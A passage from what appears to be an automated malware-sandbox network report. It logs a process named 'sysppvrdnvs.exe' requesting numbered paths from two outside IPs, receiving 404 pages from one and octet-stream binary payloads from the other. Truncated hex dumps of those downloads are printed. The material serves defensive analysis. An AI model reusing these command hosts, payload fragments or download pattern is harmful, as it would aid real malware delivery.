                                                                                                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                    Oct 26, 2024 07:27:26.833864927 CEST166OUTGET /3 HTTP/1.1
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                    Host: 91.202.233.141
                                                                                                                                                                                                    Oct 26, 2024 07:27:27.108143091 CEST728INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                    Date: Sat, 26 Oct 2024 05:27:26 GMT
                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                    Content-Length: 564
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                    Oct 26, 2024 07:27:29.131223917 CEST166OUTGET /4 HTTP/1.1
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                    Host: 91.202.233.141
                                                                                                                                                                                                    Oct 26, 2024 07:27:29.404838085 CEST728INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                    Date: Sat, 26 Oct 2024 05:27:29 GMT
                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                    Content-Length: 564
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                    Oct 26, 2024 07:27:31.428791046 CEST166OUTGET /5 HTTP/1.1
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                    Host: 91.202.233.141
                                                                                                                                                                                                    Oct 26, 2024 07:27:31.702393055 CEST728INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                    Date: Sat, 26 Oct 2024 05:27:31 GMT
                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                    Content-Length: 564
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    11192.168.2.854306185.215.113.6680760C:\Windows\sysppvrdnvs.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Oct 26, 2024 07:27:34.859272957 CEST166OUTGET /1 HTTP/1.1
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                    Host: 185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:27:35.879595995 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                    Date: Sat, 26 Oct 2024 05:27:35 GMT
                                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                                    Content-Length: 110600
                                                                                                                                                                                                    Last-Modified: Wed, 25 Sep 2024 06:10:18 GMT
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    ETag: "66f3a94a-1b008"
                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                    Data Raw: 4e 47 53 21 00 02 00 00 02 38 79 12 a8 9a 87 6a 07 b8 bb 78 39 22 7b 5b 26 ab 0b 54 4c be 08 2c 0a 8d 4c c0 6e 44 be d8 37 30 4c 6e a5 cc 8b 4d 50 c1 42 a2 d2 65 ba a4 81 27 94 4c 70 56 4a a8 a2 db 67 f9 0c f5 59 c6 b2 c1 1f 8d 5d ac c3 89 ec 68 3d 86 ef fd bc 4f 74 28 e6 50 3a c2 d3 07 6a 6a 6f 46 93 04 e6 15 ed 32 79 1c 90 b2 fd 3a d3 50 40 82 62 8a ae c7 36 5d 75 bd eb d1 44 5c de f6 69 34 3c d2 0d d5 09 51 3f 8a ab d7 f4 f8 b8 08 5f 3b 5d fc f8 21 e5 8e 41 10 34 b5 41 17 01 ea 08 9c 89 31 0a ed 63 f0 73 61 5e 9c 2b 64 51 21 78 6c fb 36 51 ff f4 38 77 85 e5 03 61 37 3f e6 e7 5d 83 54 25 3a 1b d7 d8 85 48 d7 31 b5 b0 aa 09 24 0f 6a bf de 08 ac b0 8b 83 34 66 b3 6b 21 83 92 7f 70 f8 46 7a d3 76 9e 08 8b 91 ef 0f 01 96 12 82 3f 6c 18 f9 80 35 dd a9 85 c7 37 09 bc 2e 28 13 d8 dd c0 99 3d 63 89 73 04 0d 63 08 46 cd 7b f2 d1 2d c6 75 45 b7 38 d9 44 1a f4 db 85 9f 51 46 02 09 c3 7c ba 38 8a 65 79 13 33 27 a7 40 3c 4b 71 9e fc 22 53 f7 2d 93 90 3f fd b9 34 a0 73 cc df b8 7f 2e 91 a7 53 85 ba 32 d7 bf fe [TRUNCATED]
                                                                                                                                                                                                    Data Ascii: NGS!8yjx9"{[&TL,LnD70LnMPBe'LpVJgY]h=Ot(P:jjoF2y:P@b6]uD\i4<Q?_;]!A4A1csa^+dQ!xl6Q8wa7?]T%:H1$j4fk!pFzv?l57.(=cscF{-uE8DQF|8ey3'@<Kq"S-?4s.S2j=eLeYh+[}AM,@gW\Z)ET/|"bWRoj(|A,>?1;>"&;ucy[t`w #cdyysGx_Ch*I]Dey.:FQQC BZn2@X&>UYgDYZ)F!FFeh4VGK>V3#+$,&S.lkIF\Ck$)J_l\",0u!kT}V!YB{}nAL[Xo[+1\m,^bLMDj-g <_8d+-D/k<'dv-Qi`N4W(_"%5q844o4gdxsifcD^]M(A[gB4mwAV@g54]BLr!n*WG,6+uY9U4OP&?vKi>X7Dto=2f
                                                                                                                                                                                                    Oct 26, 2024 07:27:35.879612923 CEST1236INData Raw: b4 bd ad 62 69 93 e7 43 cf 35 4e 07 3e c2 37 6c 66 f1 c1 c8 10 ff ff ef 5e e4 1e 40 46 f2 4f 47 bb b9 53 b2 17 fe 91 80 48 a4 a5 9e 88 5e b0 09 b2 f7 1a 05 c1 ae 77 a6 1a 01 ba f2 27 90 fd 83 00 22 7e ab d7 16 d7 69 b8 9a d6 11 59 f5 10 ed 6f d3
                                                                                                                                                                                                    Data Ascii: biC5N>7lf^@FOGSH^w'"~iYoT:1<~!HhQ:P^(K3: yXM^gQD55!HF?}'+Wxrp8U_HK\UxQ)|Rai>&y+eu B
                                                                                                                                                                                                    Oct 26, 2024 07:27:35.879622936 CEST1236INData Raw: 92 02 a6 af d3 8a 44 33 dc 7e c6 0b 87 b7 17 5b 32 9e d8 e3 7e 89 ae fe 0d ce 3b 86 4f 41 86 56 53 cf 5c d1 6d b9 e7 ab 2b 74 96 68 fa 98 de de 1d 87 40 33 cd 44 42 72 de c3 3e 36 e6 f9 aa 06 79 c6 c8 0c 64 26 c0 a8 10 55 43 92 4b 87 97 c4 af 18
                                                                                                                                                                                                    Data Ascii: D3~[2~;OAVS\m+th@3DBr>6yd&UCK$D8$O#5LCLt.;{1h3]t.Eie\?|6 : 3+`Se0L#}tK1(*ss|@a$@bWEgU4
                                                                                                                                                                                                    Oct 26, 2024 07:27:35.879662991 CEST1236INData Raw: c9 90 52 78 37 15 55 e7 3b 12 de 97 ad 09 08 34 9c f1 3e 5e eb 2a 63 8c 43 75 c5 71 82 c9 58 2a a4 3e cc f8 12 f3 7a b1 87 1d c5 f2 2b 58 69 da b0 8d c8 23 05 88 f5 df cf 88 ba 49 a6 1f bc 70 47 57 59 26 4d 98 3e 2e a6 8d 60 89 13 9e 54 9b 34 50
                                                                                                                                                                                                    Data Ascii: Rx7U;4>^*cCuqX*>z+Xi#IpGWY&M>.`T4PXsK,UG]-7%h,S'\_KpX~h-v>CDyI(Bk%PrRq'? OZ,0+F_p4$8ce5\JA|
                                                                                                                                                                                                    Oct 26, 2024 07:27:35.879677057 CEST1236INData Raw: 2d 5d 5d 9a a2 19 58 54 3f 1c 22 27 fe cc 6c ae 32 01 57 29 8c 43 bd f9 12 3a 50 2a 41 97 76 a7 d8 52 38 48 d8 e9 cd 74 59 bb d4 bf b6 10 02 29 f9 f4 15 10 c3 73 2a 5e da 1f b6 fe f8 51 3f f6 9f 7b 5a 9f 07 62 9c 14 01 e1 93 84 e8 4e b5 e0 0e b3
                                                                                                                                                                                                    Data Ascii: -]]XT?"'l2W)C:P*AvR8HtY)s*^Q?{ZbNg!WOxD%f~vp{;yaAgXp# ?}0_LIa{g2ML2)83vZX;*M#>}df(gz;OE\wd(afrc@(Q
                                                                                                                                                                                                    Oct 26, 2024 07:27:35.879694939 CEST1236INData Raw: 76 f8 eb 35 9a 49 f5 5f dc d3 37 59 0a e9 b8 e1 06 d3 e6 66 4b 04 7f 7b ee 03 3f 6a 27 e1 61 5e 8a b2 45 ed 6d b7 a8 9d 86 11 01 0f ff 78 01 fe 0d 80 ed c8 50 40 0b 73 80 eb b9 26 83 c3 d3 d3 ac 38 79 5a 41 ae 8b 77 07 a3 08 0e d9 8d 46 32 48 d1
                                                                                                                                                                                                    Data Ascii: v5I_7YfK{?j'a^EmxP@s&8yZAwF2HPN.Tz=p7g8Zc4H\lAv#N`'6Z\SBJ!rV20S{}rLdad+0hFaGv:;]ud8[H9PCE=Yd
                                                                                                                                                                                                    Oct 26, 2024 07:27:35.879705906 CEST772INData Raw: c0 ba f9 08 b0 e4 da 68 51 42 b9 b5 09 39 34 51 01 40 fa 4b 87 b4 59 52 e7 f0 45 99 02 36 a3 10 c6 09 75 00 a8 1e 88 ea 1e bf 16 50 e8 c8 cb d1 d0 12 62 9d 5e 26 51 2e a2 08 8b 75 e4 14 c9 1c 8c ef 0a b7 18 83 88 9c 47 30 5e 57 34 38 ba b4 ac 95
                                                                                                                                                                                                    Data Ascii: hQB94Q@KYRE6uPb^&Q.uG0^W48mh.z)|XV#%Y7myeXzOW075($Q?oXC(J7 L!Ce\_GMSqM#&@_(8@
                                                                                                                                                                                                    Oct 26, 2024 07:27:35.879719019 CEST1236INData Raw: 0e fe 87 3e 4f 21 0d 7b 1b 80 5c 6f 14 03 39 e6 ed 8f b8 50 2d 5c 9f 20 a9 97 dd c2 81 67 99 28 c0 fd 79 84 31 c8 45 c8 b8 16 f9 e3 47 4b 39 dc d9 02 cf 81 f4 0d 09 2f 70 76 41 79 83 e5 05 8a 0b 4e 62 67 ee 5a 8e 8d 01 c9 46 27 b7 eb d5 25 e2 56
                                                                                                                                                                                                    Data Ascii: >O!{\o9P-\ g(y1EGK9/pvAyNbgZF'%V[X$x7Z'Owa5hhyX&1/v.& 74}D~"}-TN.`"=aUNoPpy@U$f^{q[
                                                                                                                                                                                                    Oct 26, 2024 07:27:35.879731894 CEST1236INData Raw: f5 ad de 83 04 62 ff cd ce b4 96 e9 15 c7 26 a3 0c c4 7a 68 15 ba 48 aa cc 7d 62 74 5e 25 2f b2 98 10 6d 3d c4 e6 b1 0e 45 53 ca 2f b8 89 6e 6f 80 95 61 81 59 51 d0 ab 2a 6a db 92 9a 25 ef 20 bb 8c 62 2f cc fd 92 27 87 c9 2c b7 50 9e cf ff d3 40
                                                                                                                                                                                                    Data Ascii: b&zhH}bt^%/m=ES/noaYQ*j% b/',P@zB%7O]N0}YZ2:H%>%i)uELv;|o|p6-y)eb*B!p;gaO)[4.W{6R,+*Yq3QqTS7d$6n^ ouj
                                                                                                                                                                                                    Oct 26, 2024 07:27:35.879744053 CEST1236INData Raw: 08 30 68 33 a5 3b e8 f4 5f 4c 86 27 3b a3 2f d6 48 c9 f5 6e 93 9f a2 99 b8 4c d5 b0 20 8e ec fe ed 1b d6 a3 e4 2b 3c a6 40 0c 24 35 e1 79 7d 8f 90 3a a7 2a 0d 6b 7a e0 ca 4d b0 23 0e 6d 4c 55 1c 62 fd c9 1b 71 1b 75 38 f9 68 3b 21 ea 20 8a db 04
                                                                                                                                                                                                    Data Ascii: 0h3;_L';/HnL +<@$5y}:*kzM#mLUbqu8h;! u=voy.Y=;"v5!=VSa]+384(qhkc%c-7p0Q.7#A9<U3NW4:0T]Gl_Ht&:UP
                                                                                                                                                                                                    Oct 26, 2024 07:27:35.879791021 CEST1236INData Raw: 32 6c 47 41 7a 43 53 a6 e8 90 30 88 9e c5 41 a6 8b a8 20 fc fc bd 19 44 70 bf 68 6e eb 87 11 ed b1 2c 44 b0 9e b6 5f 33 fc 90 f0 01 8a 25 97 b6 4a db b4 39 ce 56 ef 44 52 2e 4a b1 f8 35 b6 c2 5d d9 5f 2f 1f ad 94 a4 30 87 a4 49 d1 aa 3a 8f 5d c2
                                                                                                                                                                                                    Data Ascii: 2lGAzCS0A Dphn,D_3%J9VDR.J5]_/0I:]10<zbiZ,.(c%t:o|-;@gd|q/p?x@uvO=dN^|QHQ]JeUfH*O!$Ge!F7v.2He"5mjr=


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    12192.168.2.854325185.215.113.6680760C:\Windows\sysppvrdnvs.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Oct 26, 2024 07:27:37.950870991 CEST166OUTGET /2 HTTP/1.1
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                    Host: 185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:27:38.842363119 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                    Date: Sat, 26 Oct 2024 05:27:38 GMT
                                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                                    Content-Length: 8960
                                                                                                                                                                                                    Last-Modified: Fri, 18 Oct 2024 09:57:02 GMT
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    ETag: "671230ee-2300"
                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                    Data Raw: 24 ca 67 ed 72 35 5d b1 46 f1 4d 5b 99 be 6f 06 49 cd 95 a1 a2 11 e9 12 d3 c7 e2 35 85 45 62 e3 98 c2 b5 e8 b3 c3 bf 4c 36 2c 95 69 25 c7 6b 5a 0e 12 d1 d0 d9 38 1e 82 f6 e8 65 50 49 7c 94 06 0f 9b 93 3c f5 9e 69 71 94 f4 be ed 23 e0 11 fd 01 bb d6 0f 4f 40 35 bd 1b 55 7c 2a 7b 60 29 b2 bc d2 5d 82 48 ae a6 d6 e5 8d b7 02 e1 04 86 78 c0 95 2d 88 ea 8d be 64 52 7e 41 f0 7d 22 32 c1 9b e2 e3 14 80 83 e5 cb 20 2b 9c 28 aa 2a ce 52 d2 6d ab 02 db b7 dc 64 f9 a7 cf 21 e1 c6 28 b0 93 0a 24 b9 ec 35 1a 74 e4 b2 b9 a3 cc 46 d5 5d c9 bc 99 ad 3c ab 67 22 d8 c7 97 f2 56 04 28 31 7d 8c 5d 43 1a 88 ae 8d 05 a9 18 e4 b6 73 33 0c 16 37 36 f3 e3 88 97 26 e4 9a b3 ae 0b 49 63 11 8c bf 25 74 ec e5 68 fd 49 ed 80 62 bd f3 a4 fe e9 d1 52 28 e2 bc d0 e5 01 15 9e 7d b8 da 49 45 ae fd 1b 3c fc a8 8a 03 da 5d 9c c4 a1 43 c5 12 ab c3 c4 39 c0 a4 db f5 78 69 7c 06 e7 0e 81 91 f3 84 d2 da f5 d6 2f d6 12 f8 e0 09 3e 79 9d 8a 34 6d e0 ad 0b 33 f0 e1 68 4f 83 05 9c da a4 1f 3b 02 c3 e0 a4 3c 85 7c ab 99 35 b0 2c af 30 dd 74 41 [TRUNCATED]
                                                                                                                                                                                                    Data Ascii: $gr5]FM[oI5EbL6,i%kZ8ePI|<iq#O@5U|*{`)]Hx-dR~A}"2 +(*Rmd!($5tF]<g"V(1}]Cs376&Ic%thIbR(}IE<]C9xi|/>y4m3hO;<|5,0tA`JNn;wesqT_:<fb7JH3& f1FGc&k,Jx+c`ws~(sFIT,5\)}-@.4>aue\v=IkB[Q2cLAlTrOUY*mj#uUP>Y{,Tk3h,v)PTK3_++mNP[qeG9f|[-&M~&14w_la/okwM_w^7Rgg%Tv}.Tp;dSuzFPHZIpz50g.`lK\V3tryl2R]?czmvo\ 0oN3aPV=BE\ _^hVf\*n$0qC7BQn.}c/Yd=G-TSx&zwi:,aoouHn8ZxF^=RnUTD9'
                                                                                                                                                                                                    Oct 26, 2024 07:27:38.842427969 CEST112INData Raw: 93 57 98 e3 4c ac 64 50 69 d5 5e 60 5a 42 6a 17 d0 32 d7 d9 a3 9b b5 09 7a 01 5c d5 9a f5 b4 51 04 76 c6 6d 7e 0d de 69 d1 63 ff bd c2 b8 2c 86 13 5e 38 49 df c1 51 01 c0 d9 12 0c ba 3d d0 82 60 7b 3d ce 3a 38 e6 8c dc 07 d6 cd 79 a1 7c 5e 57 03
                                                                                                                                                                                                    Data Ascii: WLdPi^`ZBj2z\Qvm~ic,^8IQ=`{=:8y|^WaO".m).=WP
                                                                                                                                                                                                    Oct 26, 2024 07:27:38.842439890 CEST1236INData Raw: 1a 7e 54 ab 8b 45 f0 f6 cd be e1 a1 4c 42 63 2a 88 24 37 be 0d 52 6c ca 2d 11 74 6a 4f 1c 96 52 71 18 29 06 58 2e ed 84 4a d6 69 35 40 34 36 fa a4 03 08 6e 3d cc 79 d5 da 9b cd e5 49 62 a0 15 b7 25 90 b3 49 fd 19 9c 00 1d 6e be 47 6c 88 53 1f 7a
                                                                                                                                                                                                    Data Ascii: ~TELBc*$7Rl-tjORq)X.Ji5@46n=yIb%InGlSz33(:&eGco%bA;0=X^tiIIsnc:F&lU'/xJQHI9xJ :6A@dq"0o3zC4/mqM
                                                                                                                                                                                                    Oct 26, 2024 07:27:38.842488050 CEST1236INData Raw: 18 79 9c 05 4e c4 8e 9a a9 9d c9 5b 93 d9 75 84 fb 01 3a 8d e5 b7 91 3a 76 75 6b d3 6c a6 b9 fe a4 2f 47 5e 75 68 33 a0 76 87 6a 1a b3 ec d4 d7 f1 a1 5a c1 ff 30 43 2c 25 b0 ea 1e 1b 51 9d 20 86 8b df 35 f9 6d 0b 1e 79 38 0d bc 65 b9 0b 84 27 d9
                                                                                                                                                                                                    Data Ascii: yN[u::vukl/G^uh3vjZ0C,%Q 5my8e'+o{D82.p/{hp'SS/g)WJ4)`&a0oc]Uo(4M'_sG@mxy6("S9%5]9[h1_&},fO
                                                                                                                                                                                                    Oct 26, 2024 07:27:38.842502117 CEST1236INData Raw: 84 70 54 7d 76 a7 80 23 30 99 b6 5d 7b 26 54 bb 8f 3b 49 5d 85 8d ef 23 d3 03 bf d7 a3 12 7a 16 b2 c0 04 d2 f8 59 ed 93 77 a1 9b 16 eb 38 08 4f 1f f3 41 a0 7b 13 e5 00 b1 6b dd 19 4b ed c5 fb 8c e7 26 47 0f 46 fb 4d 58 09 99 98 14 46 4a 2b a4 8e
                                                                                                                                                                                                    Data Ascii: pT}v#0]{&T;I]#zYw8OA{kK&GFMXFJ+I$?r-:Pw_gN/6p"]c{1 NTSgA7|I5Y&hOhAcUz(S7S})!s%F'GWfS\D5LR)r9
                                                                                                                                                                                                    Oct 26, 2024 07:27:38.842528105 CEST636INData Raw: 03 c4 8d f3 91 32 4d 71 23 2b b6 64 8c 4d 8f 93 31 e2 1e fb af 3b 6f 02 ab bb c8 79 d0 e2 41 b5 7a 6d ab 40 21 3c 82 19 45 fe 84 e5 c5 6e 6b 20 3f dd 13 d4 43 0a 1a bb b4 e1 3d 7c 39 50 9e c0 b5 a3 65 f5 7f 64 6e dd 19 47 0b 44 ba 46 25 a8 ea 9e
                                                                                                                                                                                                    Data Ascii: 2Mq#+dM1;oyAzm@!<Enk ?C=|9PednGDF%F-_!Y^uODIuH"oR^k=%S\(L7QREU6=oNL |~;vF|5qOh[IO*9%i0q~3T|UJ
                                                                                                                                                                                                    Oct 26, 2024 07:27:38.842564106 CEST1236INData Raw: 41 db 62 5a 59 85 9f 90 e7 c2 50 0b 9a 55 34 0d 9e 1e 06 a3 5d 1f cb a4 ba ed a5 26 f9 5e 65 71 44 ec a8 75 54 62 46 f1 9c 38 cb 5d 9d 55 4e 4e ba 07 4b c4 87 34 ef 0b 4b 6e 8c 67 15 d9 a8 b0 fb 6d 8c 71 54 2d 09 78 0a 8f 99 b8 39 ce 3e 43 05 3f
                                                                                                                                                                                                    Data Ascii: AbZYPU4]&^eqDuTbF8]UNNK4KngmqT-x9>C?EMJK;fY(TQFSq3Vr)k!?jpb,L1KP_NsIYlu../)7= xsr]IqB<c4$
                                                                                                                                                                                                    Oct 26, 2024 07:27:38.842576981 CEST1236INData Raw: ad c3 91 21 5c 11 c1 09 66 85 f0 73 e8 41 e9 46 88 29 2c d0 af 9c 6c 3b f5 6d 4e bd f9 7c b7 23 7b cb b1 f8 96 d8 53 fe 3f be 96 26 50 3c 47 35 49 6a a2 8d e5 eb f1 be b1 59 c1 57 59 3e bf 71 9c e0 2b b6 a7 db 66 8e 4c 7e a3 89 9f d8 7f 57 d1 12
                                                                                                                                                                                                    Data Ascii: !\fsAF),l;mN|#{S?&P<G5IjYWY>q+fL~W5GXPY?ECjZ@=:pj|KYD$~$nb"}rRu{5J@LY{\eY d8`}$@[b V
                                                                                                                                                                                                    Oct 26, 2024 07:27:38.842602015 CEST1060INData Raw: 76 cb d8 48 92 d7 6c 1e e1 36 3d 4e 6b f9 d6 65 d0 df f9 26 75 2b 62 0d a1 d9 0d 49 d6 42 dd 60 15 da d4 ac 1b cb a2 db 9a 23 a2 a9 bc 30 73 1b 27 ac 5d a1 f6 8b 14 c2 0e 0f f5 42 18 a3 f1 17 e9 34 cc 2f c2 81 9d a2 10 8b 06 38 16 3e d6 09 12 90
                                                                                                                                                                                                    Data Ascii: vHl6=Nke&u+bIB`#0s']B4/8>XuP_Q@(^OS$&?Jl[e:s8Mf?QCxCzUw%tMoueUiQerj1F\FC1qIfbh\I.Xj[R)^


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    13192.168.2.854341185.215.113.6680760C:\Windows\sysppvrdnvs.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Oct 26, 2024 07:27:40.872508049 CEST166OUTGET /3 HTTP/1.1
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                    Host: 185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:27:41.790498018 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                    Date: Sat, 26 Oct 2024 05:27:41 GMT
                                                                                                                                                                                                    Content-Type: application/octet-stream
